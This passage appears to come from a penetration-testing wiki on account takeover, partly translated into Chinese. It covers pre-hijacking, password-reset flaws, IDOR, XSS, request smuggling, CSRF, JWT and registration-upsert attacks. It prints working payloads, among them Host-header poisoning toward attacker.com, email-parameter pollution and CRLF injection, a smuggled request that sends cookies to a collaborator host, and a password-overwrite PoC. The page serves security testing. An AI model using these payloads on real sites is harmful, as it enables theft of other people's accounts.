def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes a verified attacker account while the victim flow also succeeds.
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues occurs when an attacker performs actions on the victim’s email before the victim creates their account, then regains access later.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
- Attacker: registers a classic account with victim email and sets a password
- Victim: later signs up with SSO (same email)
- Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
- Attacker: creates account and holds a long‑lived session (don’t log out)
- Victim: recovers/sets password and uses the account
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
- Victim: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
- Attacker: initiates email‑change to attacker mail and withholds confirmation
- Victim: recovers the account and starts using it
- Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
- Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
- Victim: signs up via classic route
- Service merges on email without checking `email_verified` or performing local verification

Practical tips

- Harvest flows and endpoints from web/mobile bundles. Look for classic signup, SSO linking, email/phone change, and password reset endpoints.
- Create realistic automation to keep sessions alive while you exercise other flows.
- For SSO tests, stand up a test OIDC provider and issue tokens with `email` claims for the victim address and `email_verified=false` to check if the RP trusts unverified IdPs.
- After any password reset or email change, verify that:
- all other sessions and tokens are invalidated,
- pending email/phone change capabilities are cancelled,
- previously linked IdPs/emails/phones are re‑verified.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. 向你的邮箱请求密码重置
2. 点击密码重置链接
3. 不要更改密码
4. 点击任意第三方网站（例如：Facebook、twitter）
5. 在 Burp Suite 代理中拦截请求
6. 检查 referer header 是否在 leak 密码重置 token。

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. 在 Burp Suite 中拦截密码重置请求
2. 在 Burp Suite 中添加或编辑以下 headers：`Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. 使用修改后的 header 转发请求\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. 查找基于 _host header_ 的密码重置 URL，例如：`https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR 在 API 参数

1. Attacker 必须使用他们的账户登录并转到 Change password 功能。
2. 启动 Burp Suite 并拦截请求
3. 将其发送到 repeater 选项卡并编辑参数：User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

弱密码重置令牌

密码重置令牌应每次随机生成且唯一。
尝试确定令牌是否会过期或是否始终相同，在某些情况下生成算法很弱且可以被猜测。以下变量可能被算法使用。

• 时间戳
• 用户ID
• 用户电子邮件
• 名和姓
• 出生日期
• 加密/密码学
• 仅数字
• 短令牌序列（字符范围在 [A-Z,a-z,0-9] 之间）
• 令牌重用
• 令牌过期日期

Leaking Password Reset Token

1. 使用 API/UI 触发针对特定电子邮件的密码重置请求，例如: test@mail.com\
2. 检查服务器响应并查看 resetToken
3. 然后在 URL 中使用该令牌，例如 https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. 在系统上注册一个与受害者用户名相同，但在用户名前后插入空格的用户名。例如："admin "
2. 使用你的恶意用户名请求密码重置。
3. 使用发送到你邮箱的令牌并重置受害者的密码。
4. 使用新密码登录到受害者账户。

The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. 在应用或子域中找到 XSS，如果 cookies 被设置为父域范围：*.domain.com
2. Leak the current sessions cookie
3. 使用该 cookie 以该用户的身份认证

Account Takeover Via HTTP Request Smuggling

1. 使用 smuggler 来检测 HTTP Request Smuggling 的类型（CL, TE, CL.TE）
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. 构造一个请求，将 POST / HTTP/1.1 覆盖为以下数据：
   GET http://something.burpcollaborator.net HTTP/1.1 X:，目的是将受害者重定向到 burpcollab 并窃取他们的 cookies\
3. 最终请求可能如下所示

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone reports exploiting this bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

通过 CSRF 的账户接管

1. 创建一个用于 CSRF 的 payload，例如: “HTML form with auto submit for a password change”
2. 发送 payload

通过 JWT 的账户接管

JSON Web Token 可能被用于验证用户。

• 编辑 JWT，将 User ID / Email 修改为其他用户
• 检查弱 JWT 签名

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset（对已存在邮箱执行 Upsert）

某些 signup 处理器在提供的 email 已存在时会执行 upsert。如果该 endpoint 接受仅包含 email 和 password 的最小请求体，并且不强制验证归属，那么发送受害者的 email 就会在 pre-auth 阶段覆盖他们的 password。

• Discovery：从 bundled JS（或 mobile app 流量）中收集 endpoint 名称，然后使用 ffuf/dirsearch 对类似 /parents/application/v4/admin/FUZZ 的 base paths 进行 fuzz。
• Method hints：当 GET 返回类似 “Only POST request is allowed.” 的信息时，通常表明正确的动词是 POST，并且期望一个 JSON body。
• Minimal body observed in the wild:

{"email":"victim@example.com","password":"New@12345"}

示例 PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

影响：完全的账户接管 (ATO)，无需任何重置令牌、OTP 或电子邮件验证。

参考资料

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。